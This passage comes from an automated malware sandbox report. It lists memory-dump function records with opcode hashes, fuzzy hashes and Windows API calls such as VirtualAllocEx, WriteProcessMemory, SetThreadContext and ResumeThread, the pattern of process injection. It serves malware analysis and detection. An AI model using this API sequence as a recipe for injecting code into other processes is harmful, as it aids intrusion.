                                          • Instruction Fuzzy Hash: 1081E674E017188FDB48CFEAC984AEEBBB2AF89300F10902AD515BB364D7349946CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b6e2c90a32c9e157990c0ca8c55b16d7be97419cef58ce1b789b1e511fbc395
                                          • Instruction ID: bd483a29b67d41af0973d61f99a46788a3b0c4e643dde1ae33938430bb3f1fe9
                                          • Opcode Fuzzy Hash: 5b6e2c90a32c9e157990c0ca8c55b16d7be97419cef58ce1b789b1e511fbc395
                                          • Instruction Fuzzy Hash: 6181E474E012188FDB48CFEAD984AEEBBB2BF88300F10902AD515BB354D7349946CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcb1fb6179f6007adad6ec5481c5474f9de65c721c4b5d3f4603c0a68f57c30d
                                          • Instruction ID: 13e5fd4544c7b2f0da80b8a7af89dfc83bcb671c7e6f1cb19c9e9e12196c5a61
                                          • Opcode Fuzzy Hash: bcb1fb6179f6007adad6ec5481c5474f9de65c721c4b5d3f4603c0a68f57c30d
                                          • Instruction Fuzzy Hash: 5571F374E012188FDB48CFEAD984AEEBBB2BF88300F20902AD515BB354D7359946CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a79f2f48168a04787cb2c5842d77aafd8d63e425eaff08b602fb85d653d1aa80
                                          • Instruction ID: dcf69d12fa352cadf23a2762dab0ebf9439dfcd9b5c8120e76f8f522e803bbba
                                          • Opcode Fuzzy Hash: a79f2f48168a04787cb2c5842d77aafd8d63e425eaff08b602fb85d653d1aa80
                                          • Instruction Fuzzy Hash: DF51D474E012199FDB44DFAAD480AEEFBB2BF88304F24D569D414A7355DB349982CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60e72515b371692aa4e9476245daef1e0d51bdfba5caadd1af2b196c01b43fd3
                                          • Instruction ID: ec27b26b66b142eee256d7cc49ab72ac46502553e36b2f2cd33dc5c9d8820b32
                                          • Opcode Fuzzy Hash: 60e72515b371692aa4e9476245daef1e0d51bdfba5caadd1af2b196c01b43fd3
                                          • Instruction Fuzzy Hash: 235158B0E143198FDB48DFA6D5405EEFBF2EB8D300F24D46AD419AB254D7348A418F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 77387df955aba757c80790c5f5133b715a4ec9c0916a96d8f3712a19276a76b0
                                          • Instruction ID: 5db3e89e9478980c857ffaace9d904134f6b8758a86b5c4d7fc488deffc0f95d
                                          • Opcode Fuzzy Hash: 77387df955aba757c80790c5f5133b715a4ec9c0916a96d8f3712a19276a76b0
                                          • Instruction Fuzzy Hash: EC41F575E016088FDB44DFAAD841BEEBBF2EF88300F24C465D418AB354EB349946CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e95a9909324a690cffba7ea3356f4c5d31161eb8e7101b9bd17f24fbff88e5cb
                                          • Instruction ID: 500e2da109052442d913fe766c9510c7ee756ab92c2e7a47881ac7cbcfe54036
                                          • Opcode Fuzzy Hash: e95a9909324a690cffba7ea3356f4c5d31161eb8e7101b9bd17f24fbff88e5cb
                                          • Instruction Fuzzy Hash: 2D2125B1E016488BEB58CFABD9442DEBBB3AFC8310F14C06AD509B6258DB344A49CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB8D0
                                          • GetCurrentThread.KERNEL32 ref: 00EDB90D
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00EDB9A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID: n9"k
                                          • API String ID: 2063062207-2899673027
                                          • Opcode ID: 504d3733648caa8374f8fe394229e62d3b2656baeca25128ab9c10be15bfbebb
                                          • Instruction ID: 3d672ae280f78e1ea6256a272354423100d1b9041c03c5398b620700b3cb2539
                                          • Opcode Fuzzy Hash: 504d3733648caa8374f8fe394229e62d3b2656baeca25128ab9c10be15bfbebb
                                          • Instruction Fuzzy Hash: 555132B4900249DFDB24DFAAD948B9EBBF5FB88318F24809AE009B7350D7759844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB8D0
                                          • GetCurrentThread.KERNEL32 ref: 00EDB90D
                                          • GetCurrentProcess.KERNEL32 ref: 00EDB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 00EDB9A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID: n9"k
                                          • API String ID: 2063062207-2899673027
                                          • Opcode ID: 7e94dc9840f2678f69b45820a8ef48c272c79f9e553bf13c3d95b282991a18ed
                                          • Instruction ID: f75b65b70df1f6bb2486617b56fc9534a9a849e4570d4ec7978b0b5dbea98eb2
                                          • Opcode Fuzzy Hash: 7e94dc9840f2678f69b45820a8ef48c272c79f9e553bf13c3d95b282991a18ed
                                          • Instruction Fuzzy Hash: 5E5143B4900249CFDB24DFAAD948B9EBBF5FB88318F24809AE009B7350D7749844CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00ED97CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: TP$TP$n9"k
                                          • API String ID: 4139908857-720568475
                                          • Opcode ID: 4becfe21276d2d30743478d8a195a84c5eafdbe8415dee7ad5b9f1025380632a
                                          • Instruction ID: 4ff6de9d3c7b786d47a628d58c87d728146cf1486a747395f289bcf6fe7e3432
                                          • Opcode Fuzzy Hash: 4becfe21276d2d30743478d8a195a84c5eafdbe8415dee7ad5b9f1025380632a
                                          • Instruction Fuzzy Hash: 63711370A00B059FDB24DF2AD54175ABBF1FB88308F00992AE45AE7B51DB75E806CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 011135F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: n9"k
                                          • API String ID: 963392458-2899673027
                                          • Opcode ID: a051f7fe9e4819dc8cd9262b2a018e6ec59287d790b805e13be1e56b08464b3e
                                          • Instruction ID: 59d926f37a31d03d7d1e55972882261cc53dd2e4e619eb630b9a779a2176ede1
                                          • Opcode Fuzzy Hash: a051f7fe9e4819dc8cd9262b2a018e6ec59287d790b805e13be1e56b08464b3e
                                          • Instruction Fuzzy Hash: EE512571900318DFDB64CF99C880BDEBBB5BF48314F1584AAE908B7254DB709A88CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 011135F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: n9"k
                                          • API String ID: 963392458-2899673027
                                          • Opcode ID: ba27cfb782e96271434e866ff8fe0d615872c17b3a999e3b0982670777b45b2a
                                          • Instruction ID: fe63e77cd54012e2fdda28f5eab5d025e3caf7d93f02261186234308d7e4b40a
                                          • Opcode Fuzzy Hash: ba27cfb782e96271434e866ff8fe0d615872c17b3a999e3b0982670777b45b2a
                                          • Instruction Fuzzy Hash: 75510471900319DFDB64DF99C880BDDBBB6BF48314F1584AAE908B7254DB319A88CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00ED5661
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID: n9"k
                                          • API String ID: 2289755597-2899673027
                                          • Opcode ID: 947920c245cd8bf623bc8d152d8c362175b224e860ced198b0d5474596d727e9
                                          • Instruction ID: 3610eb6b296218884a3452043afd643b6f56e44066debdb6d098529a71f946c6
                                          • Opcode Fuzzy Hash: 947920c245cd8bf623bc8d152d8c362175b224e860ced198b0d5474596d727e9
                                          • Instruction Fuzzy Hash: 29512371C04618CFDB20DFA9C84479EBBB5FF49308F2480AAD458AB251D775A94ACF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 00ED5661
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID: n9"k
                                          • API String ID: 2289755597-2899673027
                                          • Opcode ID: b18b3029368ba3d4b7a49e37ec125c84747c5d7f4bc9ae7769ab9827598990d4
                                          • Instruction ID: afda5d9d199f84e9e30cd722d5af43db1af3fa96bcf4a83b268d7d00f2f91ad4
                                          • Opcode Fuzzy Hash: b18b3029368ba3d4b7a49e37ec125c84747c5d7f4bc9ae7769ab9827598990d4
                                          • Instruction Fuzzy Hash: 4D41F2B1C00618CFDB24DFA9C844B9DBBB5FF48308F60806AD418BB251DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: n9"k
                                          • API String ID: 1029625771-2899673027
                                          • Opcode ID: 586d3c7c05e4b972dd0d564deffaa57cfc59808d3e3688a146d4b34c2125afbf
                                          • Instruction ID: 7a05286c48be53885c7c7521a84c66148273db147733c9111435a6ec8f76ac92
                                          • Opcode Fuzzy Hash: 586d3c7c05e4b972dd0d564deffaa57cfc59808d3e3688a146d4b34c2125afbf
                                          • Instruction Fuzzy Hash: 61219CB28083898FCB11DFA9C894ADAFFF4EF56354F1584AED095AB201C374A546CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01113AD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: n9"k
                                          • API String ID: 3559483778-2899673027
                                          • Opcode ID: ed531dd01e8a063154ad11af60d5fa266a3f1e150731f118c39138e711965350
                                          • Instruction ID: b04b9b00706ff0afa4c8c55906db3a3c07b594dccea91121a658b3b7af0587e0
                                          • Opcode Fuzzy Hash: ed531dd01e8a063154ad11af60d5fa266a3f1e150731f118c39138e711965350
                                          • Instruction Fuzzy Hash: DD21F3B2D002499FDB14CF9AD885BDEBBF4FB48320F10842AE519A3240D778A944CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01113AD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID: n9"k
                                          • API String ID: 3559483778-2899673027
                                          • Opcode ID: 7c2256f22e09fc0a5d0ddbf4eb3c91dc14c8bb1ee164bab3a1b6d2ce6b353710
                                          • Instruction ID: fb465eab2c1a05a02d8622cfd506f7229bcf91e077d227322b9f79ca8eb9a0e2
                                          • Opcode Fuzzy Hash: 7c2256f22e09fc0a5d0ddbf4eb3c91dc14c8bb1ee164bab3a1b6d2ce6b353710
                                          • Instruction Fuzzy Hash: 9F2105B19002499FCB14CF9AD885BDEFBF4FB48320F10842AE518E3240D778A544CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDBF27
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID: n9"k
                                          • API String ID: 3793708945-2899673027
                                          • Opcode ID: af0fd701e73177d056265513c3ecc7dd5453ababf2958f4973924bbabbd6fcde
                                          • Instruction ID: c0778caaf8b6703f5dd33f678b5f9d9b56d15fb8ce9f2100bf6c56883eb9736e
                                          • Opcode Fuzzy Hash: af0fd701e73177d056265513c3ecc7dd5453ababf2958f4973924bbabbd6fcde
                                          • Instruction Fuzzy Hash: 6821F4B5D00248DFCB10CFA9D884AEEFBF4EB48324F14801AE914A3310D374A954CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDBF27
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID: n9"k
                                          • API String ID: 3793708945-2899673027
                                          • Opcode ID: 9d916e6cda2efae51a88e755150eaba68531be7159114aa5fd8d84acb6e0e76e
                                          • Instruction ID: ac511ef68d29e6f93325972650e9fce4c8e3f6bb2f39a57e070433801e41e5ac
                                          • Opcode Fuzzy Hash: 9d916e6cda2efae51a88e755150eaba68531be7159114aa5fd8d84acb6e0e76e
                                          • Instruction Fuzzy Hash: FB21B3B5900249AFDB10CFAAD984ADEFBF8EB48324F15841AE955A3310D374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 01113887
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID: n9"k
                                          • API String ID: 1591575202-2899673027
                                          • Opcode ID: a372796f2503c4bf14a909f65880d03bfe77b88ed12f25075c8d84c5d74f85dd
                                          • Instruction ID: ce3494f409cee639e9a4d0a86f2fa704f7911ac827fc67ee2977ee1c0114866f
                                          • Opcode Fuzzy Hash: a372796f2503c4bf14a909f65880d03bfe77b88ed12f25075c8d84c5d74f85dd
                                          • Instruction Fuzzy Hash: 1B2158B1D0021A9FDB14CF9AD885BDEFBF4FB48620F14816AE418B3240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0111394F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: n9"k
                                          • API String ID: 1726664587-2899673027
                                          • Opcode ID: 08c735928baefbec32a5f039ff39a2ffe9bfe75c104575937b28b236941a0149
                                          • Instruction ID: e25a7fc959ccfe2eafa7e082de08c379e8a1e5eb5f9c7c6b7cd952fef4f6b69d
                                          • Opcode Fuzzy Hash: 08c735928baefbec32a5f039ff39a2ffe9bfe75c104575937b28b236941a0149
                                          • Instruction Fuzzy Hash: 442107B1D012499FCB20CF9AD885BDEFBF5FB48320F10842AE968A3240D334A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0111394F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID: n9"k
                                          • API String ID: 1726664587-2899673027
                                          • Opcode ID: 1ebf1b0dd0bece131c2665bcbb3bf04daccb9216c03dfaec409bd5ced1a60324
                                          • Instruction ID: b20894b5416a2d7b93437aa4e756d01af544e7908820b3a6ecc281fa5d64c4bc
                                          • Opcode Fuzzy Hash: 1ebf1b0dd0bece131c2665bcbb3bf04daccb9216c03dfaec409bd5ced1a60324
                                          • Instruction Fuzzy Hash: B421E2B19012499FCB10CF9AD985BDEFBF5FB48320F10842AE968A3250D378A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 01113887
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID: n9"k
                                          • API String ID: 1591575202-2899673027
                                          • Opcode ID: abca25c8be2ac1a68702b44254b81d711021380c85d1c80f8d2fe88b18564f4a
                                          • Instruction ID: d9e1c6d5a083fcfc0808d5fc2b8c4ee8d5f95775ecf7b085f3078457f16c3567
                                          • Opcode Fuzzy Hash: abca25c8be2ac1a68702b44254b81d711021380c85d1c80f8d2fe88b18564f4a
                                          • Instruction Fuzzy Hash: FE2138B1D102199FCB14CF9AD985BDEFBF4FB48620F14816AD418B3240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: n9"k
                                          • API String ID: 1029625771-2899673027
                                          • Opcode ID: 022247b148ef452e5fb23f3b4d292e4095452543eab57b8a9454d860590588f7
                                          • Instruction ID: d19ad82d748aae681bcc51aeeced76a9442a8b1ce10fdc04d029d6f9f63c0582
                                          • Opcode Fuzzy Hash: 022247b148ef452e5fb23f3b4d292e4095452543eab57b8a9454d860590588f7
                                          • Instruction Fuzzy Hash: D92136B28002099FCB10DFAAD844BDEFBF4EB49324F14842AE455B7200C375A546CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ED9849,00000800,00000000,00000000), ref: 00ED9A5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: n9"k
                                          • API String ID: 1029625771-2899673027
                                          • Opcode ID: 0b18d19502344a98b8368b59ee94830329996998d0d12fea279893ea623082ee
                                          • Instruction ID: e15fc0e98e19016e83f9af2c88b28e21d0f9451eab6cd2d5b456abdbe0eae9a5
                                          • Opcode Fuzzy Hash: 0b18d19502344a98b8368b59ee94830329996998d0d12fea279893ea623082ee
                                          • Instruction Fuzzy Hash: DA11D6B69002099FCB20DF9AD844BDEFBF4EB88324F15842AE515B7301C375A945CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01113A0B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: n9"k
                                          • API String ID: 4275171209-2899673027
                                          • Opcode ID: 186661543d30803facfd5928644247093487a6e9db7843e8bb4dc9e1859b6a1e
                                          • Instruction ID: 1f97b0eb26f0e1ebb00cd5b06489e30de6986a2aad769bd1ee97f2083ec79dd8
                                          • Opcode Fuzzy Hash: 186661543d30803facfd5928644247093487a6e9db7843e8bb4dc9e1859b6a1e
                                          • Instruction Fuzzy Hash: 361104B6D002499FCB20DF9AD885BDEFBF4FB48324F148419E529A7210C335A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01113A0B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: n9"k
                                          • API String ID: 4275171209-2899673027
                                          • Opcode ID: dd93c5b9e0d042114c289f977b2b9d9ae8f119ee24069829d54c8ffcbf91d9fa
                                          • Instruction ID: 800b2ec5e4579ad006a7e15cc7ff356e89f26bf1326bec2d757ecd23fefa5d7d
                                          • Opcode Fuzzy Hash: dd93c5b9e0d042114c289f977b2b9d9ae8f119ee24069829d54c8ffcbf91d9fa
                                          • Instruction Fuzzy Hash: CF11F5B69002499FCB20DF9AD985BDEFFF8FB48324F148419E529A7210C375A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00ED97CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.405267110.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID: n9"k
                                          • API String ID: 4139908857-2899673027
                                          • Opcode ID: 7519281340135212bf8a3dc12257534c5f1c14d8b220ff5f6d4f58ca67ea0b88
                                          • Instruction ID: ee7f1a01cdd4c8ef7c92714852d2a2f8dde0d4cf489b889bb05e8af86649670a
                                          • Opcode Fuzzy Hash: 7519281340135212bf8a3dc12257534c5f1c14d8b220ff5f6d4f58ca67ea0b88
                                          • Instruction Fuzzy Hash: 4C11C0B5D006498FCB20CF9AD844B9EFBF5EB88324F14845AD419B7700C375A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID: n9"k
                                          • API String ID: 947044025-2899673027
                                          • Opcode ID: 03139c6640613622c41a6eef138e9b418a2c01588267e5805bffe36933e85a51
                                          • Instruction ID: 8afb33dd47ed8c8661a155e6015672d97831e097d587f724d1a03f9c2ae894cc
                                          • Opcode Fuzzy Hash: 03139c6640613622c41a6eef138e9b418a2c01588267e5805bffe36933e85a51
                                          • Instruction Fuzzy Hash: 5E1103B18002498FDB20CF9AD584BDEFBF4EB88324F24846AD529A3240C374A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 011145A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID: n9"k
                                          • API String ID: 410705778-2899673027
                                          • Opcode ID: d1c1421ee5b931d312caf42eeb2e03e996435de287834bc97298e6a693df8f9d
                                          • Instruction ID: 4e3782748226660f9319fe7c1a371e2b44e7aee90a6f6300cc1fef695054546b
                                          • Opcode Fuzzy Hash: d1c1421ee5b931d312caf42eeb2e03e996435de287834bc97298e6a693df8f9d
                                          • Instruction Fuzzy Hash: 0811F2B58003499FDB60CF99D885BDEFBF8EB48324F148859E955A7600C378A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 011145A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID: n9"k
                                          • API String ID: 410705778-2899673027
                                          • Opcode ID: c56e1215fefb9805fb488bb40100bd8fa52c01f0c52eb2a4dc5d7a2d5904dc8e
                                          • Instruction ID: fd6ca0ef47d5ef3211a5b2e052a1d9d07ed6ac4500aff7ec0d75b36d3871aa5b
                                          • Opcode Fuzzy Hash: c56e1215fefb9805fb488bb40100bd8fa52c01f0c52eb2a4dc5d7a2d5904dc8e
                                          • Instruction Fuzzy Hash: E91112B58003499FDB20CF9AD889BDEFBF8FB48724F10841AE915A7600C374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.406002398.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID: n9"k
                                          • API String ID: 947044025-2899673027
                                          • Opcode ID: a9dc54a4ca0c34a792a9481f2245a317ce5259f901b9e66aff52e8e53d7b9f37
                                          • Instruction ID: ebdcb1a1cd45e45994c695c5aacbb2c19a54b6a3b96024a9356215e13640ebb6
                                          • Opcode Fuzzy Hash: a9dc54a4ca0c34a792a9481f2245a317ce5259f901b9e66aff52e8e53d7b9f37
                                          • Instruction Fuzzy Hash: B41115B18002498FCB20DF9AD585BDEFBF8FB48324F10845AD529A3300C774A544CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: DIs7
                                          • API String ID: 0-4141230339
                                          • Opcode ID: 6c1ded5d3db3603f5f306c09b089ddd4a34b54f0a5bcbe565341cbc43855fd93
                                          • Instruction ID: 229dc790dde1969d5bb778b7c76d77ab058be099918b1ecc647342c5692665cc
                                          • Opcode Fuzzy Hash: 6c1ded5d3db3603f5f306c09b089ddd4a34b54f0a5bcbe565341cbc43855fd93
                                          • Instruction Fuzzy Hash: 65319870E053099FDB88DFAAD8005EEBBB2EF89200F04C56AC516BB311D7318905CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: d?
                                          • API String ID: 0-3663673177
                                          • Opcode ID: 59b2457327d9bbccf0fcb77263aff44a9e49c3d598aaf55ff1a0f1a7283928ad
                                          • Instruction ID: 6fb6c1b5b068a016c361323e6efc14ea1c5ffbcb8af74343bd17a49a37d0cf31
                                          • Opcode Fuzzy Hash: 59b2457327d9bbccf0fcb77263aff44a9e49c3d598aaf55ff1a0f1a7283928ad
                                          • Instruction Fuzzy Hash: 0D211D74E05208AFDB45DFA9D584A9EBBF2EF89300F25C4A6E519A7355D730DE01CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: d?
                                          • API String ID: 0-3663673177
                                          • Opcode ID: 24a2dd5c54f59d8e99c2642b6a0b36d6d7dbd230ac1b3230c19ff46938ba98b8
                                          • Instruction ID: 05e293469d12c5832cdb7664d6f2f3f8bfd84e152463c5d9b6c3b2980ba42079
                                          • Opcode Fuzzy Hash: 24a2dd5c54f59d8e99c2642b6a0b36d6d7dbd230ac1b3230c19ff46938ba98b8
                                          • Instruction Fuzzy Hash: 0611DA74E05608EFDB44DFA9D584AAEFBF2EF89300F25C4A5E519A7355D7309A01CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: '{e
                                          • API String ID: 0-1570940953
